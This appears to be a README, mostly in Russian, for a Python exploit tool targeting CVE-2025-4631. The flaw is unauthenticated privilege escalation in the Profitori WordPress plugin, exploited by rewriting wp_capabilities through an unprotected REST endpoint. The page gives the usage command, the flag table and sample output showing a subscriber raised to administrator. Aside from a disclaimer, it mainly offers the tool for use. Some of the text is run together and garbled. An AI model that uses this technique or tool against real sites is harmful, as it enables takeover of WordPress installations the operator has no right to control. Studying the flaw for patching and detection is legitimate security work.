
Profitori 2.0.6.0 - 2.1.1.3 - Отсутствие авторизации, ведущее к неаутентифицированному повышению привилегий
Плагин Profitori (версии с 2.0.6.0 по 2.1.1.3) уязвим к неаутентифицированному повышению привилегий из-за отсутствия проверки прав доступа в конечной точке /wp-json/stocktend/v1/stocktend_object. Это позволяет удалённым злоумышленникам повышать привилегии существующих пользователей (или создавать новых) путём прямого изменения мета-поля wp_capabilities.
Этот эксплойт на Python автоматизирует процесс повышения привилегий:
readme.txt.Если проверка версии завершается неудачей, эксплойт продолжает работу осторожно, с предупреждением.

usage: CVE-2025-4631.py [-h] -u URL -id ID [--email EMAIL] [--name NAME] [--url_field URL_FIELD] [--verbose]
python CVE-2025-4631.py -u http://nxploit.ddev.site -id 3
[📄] Checking plugin version at: http://nxploit.ddev.site/wp-content/plugins/profitori/readme.txt
[✅] Vulnerable version detected: 2.1.1.3
[🚀] Exploiting in 3 seconds...
[📡] Sending privilege escalation request to: http://nxploit.ddev.site/wp-json/stocktend/v1/stocktend_object
[🎯] Exploit completed successfully!
[🧾] Updated User Information:
--------------------------------------
🆔 User ID : 3
👤 Username : subscriber
📧 Email : [email protected]
🪪 Display Name : Subscriber User
🔗 User URL :
🛡 Role Raw : a:1:{s:13:"administrator";b:1;}
[👑] Exploit By : Nxploited (Khaled_alenazi)
🔗 GitHub : https://github.com/Nxploited
📧 Email : [email protected]
requestsУстановка:
pip install requests
Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования. Любое неправомерное использование этого эксплойта против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, строго запрещено. Автор не несёт ответственности за любой ущерб или юридические последствия, возникшие в результате неправильного использования.
Автор: Nxploited ( Khaled_Alenazi )
| Flag | Description | Required |
|---|
-u, --url | 🌐 Базовый URL сайта WordPress | ✅ Да |
-id | 🆔 ID пользователя для повышения привилегий | ✅ Да |
--email | 📧 Поддельный email для отображения | ❌ Нет |
--name | 👤 Отображаемое имя | ❌ Нет |
--url_field | 🔗 Поле URL пользователя | ❌ Нет |
--verbose | 🔍 Вывод полного JSON-ответа | ❌ Нет |